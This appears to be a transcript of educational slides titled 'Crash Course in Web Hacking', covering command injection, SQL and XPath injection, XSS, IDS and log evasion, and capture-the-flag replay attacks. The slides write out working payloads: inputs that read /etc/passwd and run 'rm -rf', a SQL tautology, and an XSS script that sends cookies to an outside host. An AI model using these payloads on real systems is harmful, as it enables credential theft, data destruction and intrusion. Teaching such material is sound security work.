Crash Course in Hacking

Download Report

Transcript Crash Course in Hacking 

Mike Gerschefske
CRASH COURSE IN WEB HACKING
Hacking is illegal (most of
the time)
 Understand the laws
 Port Scanning can be considered illegal
 Post 9/11 can be act of terrorism
 DMCA Exceptions
 Educational Learning (Institution)
Who cares about web hacking?
 The days of buffer overflows and root boxes
are nearing an end…
 Non executing stacks
 People patching their systems
 Everything is turning into a web system
Power of Google
 Google knows all
 SSN/Credit Card, backend sql
 http://johnny.ihackstuff.com/ghdb.php
 intitle:snc-rz30 inurl:home/
 Robots.txt
 Don’t put secrets in here
Power of the web browser
 Is capable of HTTP GET/POST
 Capable of sending any kind of GET/POST
 Doesn’t have to run client side code (ie javascript)
 Can send anything it wants to
 Can be Bad:
 url: http://somesite/index.php?section=Admin
 Vertical Escalation
Bad Code = Bad Security
 You are not able to control client end:
 Cookies
 Do not put User Level (admin, user, etc.)
 Vertical Escalation
 Do not put user id
 Horizontal Escalation




Posts
Gets
Session IDs
All Data
Museum Example



Code from two years ago:
1 #!/usr/bin/perl
…
7 $first = param('first');










8 $last = param('last');
9 $password = param('password');
10
…
25 if (($first eq "") || ($last eq "") || (! $password eq "unbreakable")) {
26 print "<p>Could not understand or wrong password!!</p>";
27 }
28 else {
29 system "cat ./museum_ideas/${first}.${last}";
…
Some Good Combinations
Dump the password file:
First Name: .
Last Name : /../../../../etc/passwd
Password : unbreakable
Delete the whole directory:
First Name: NOTEMPTY
Last Name : & rm -rf /home/museum/public_html/cgi_bin/museum_ideas
Password : unbreakable
Command Injection
 This is basic idea of command injection
 Security through obscurity sometimes works
 Some people are very diligent
SQL Injections
 We can send commands, why not sql?
 What is SQL?
 What can we do with SQL?
 Get any data we want (that the user has access to)
 Delete all the data the user has access to
 If user is root, dump database
 If user is root, can upload and execute java/c from database
and root box
How to protect against it?
 Check parameters
 Not really…
 Need to do SQL parameterization when at all
possible
 Mark strings as strings, ints as ints
SELECT * WHERE name = @
Why doesn’t checking params
work?
 If you’re really smart it will, but if you don’t
understand the problem it wont
 This is a very difficult problem to understand
 Example:
 http://viva/ictf/index.php/SQL_Injection
 The problem is the ‘ (apostrophe) is a special
character
 To fix we just find and replace all apostrophe’s with
two ‘’ as that’s how we insert apostrophes in a string
 NO!
Second Level SQL Injection
 The problem actually isn’t solved, just more
complicated
 Take:
Username =
' OR 'a' = 'a‘
SELECT * FROM Users WHERE UserName = ''' OR
''a'' = ''a''
Goes in fine but coming out…
 Get username from DB and put in var
 Var contains SQL
 We TRUST DB to give us good data
 Create another SQL Query and the second
one is now vulnerable
 SELECT content FROM database WHERE
username = VUNSQL
XSS – Cross Site Scripting
 Malicious injection of JavaScript
 Cookie Hi-jacking
 MySpace – Replicate itself, add friends
 Samy -
http://web.archive.org/web/20060208182348/namb.la/popu
lar/tech.html
<script>
document.write(“<img
src=http://site.com/a.jpg?cookie= “ +
document.cookie)
</script>
Xpath Injection
 //user[name/test() = ‘’ or 1=1 or ‘’ and
password/text() = ‘junk’]
 Used with:
 XML RPC
 SOAP/WSDL
IDS Will Find You
 SQL/Command Injection is very easy to
detect
 IDS poor at packet fragmentation with timing
attacks
Profiling
 Need to know what you’re attacking
 Can search for exploits
 HEAD / HTTP/1.0 Example
 Everyone’s a little different
 Nmap is a good profiler
 Nessus will profile too
Tools






Add N Edit Cookie – Mozilla Firefox extension
Wget
TamperData – FireFox
Modify Headers - FireFox
Curl
Netcat/Telnet
 Proxies
 Paros Proxy – Free
 Fiddler – Microsoft, Free
 Spike – Free
Timing Attacks
 Breaking Authentication
 Username and password wrong may take x time
while username doesn’t exist takes y time
 Successful timing attacks against encryption
ASP.NET Exploit
 Debugging (source code) only available to
localhost
 Bypass this check by sending the following:
 GET http://localhost/bleh.asp?a=j HTTP/1.0
 Check’s server name variable rather then
remote address
Mod_security
 http://www.modsecurity.org/
Replay Attacks
 Socrebot deletes flag
 Scorebot adds flag
 Since the scorebot goes to everyone we have
the delete and add sequence
 Can potentially replay same delete sequence
across all enemy servers
Log Evasion
 Many logs only log ~4K of URL
 Prevents DOS from filling up logs
 If payload at the end of 4k, wont log malicious
payload
 http://somewhre.com/page.asp?foo=....&payload=M
YPAYLOAD
 Application ignores foo parameter
 Log shows up as GET /page.asp …
 Not just IIS, Sun One App Server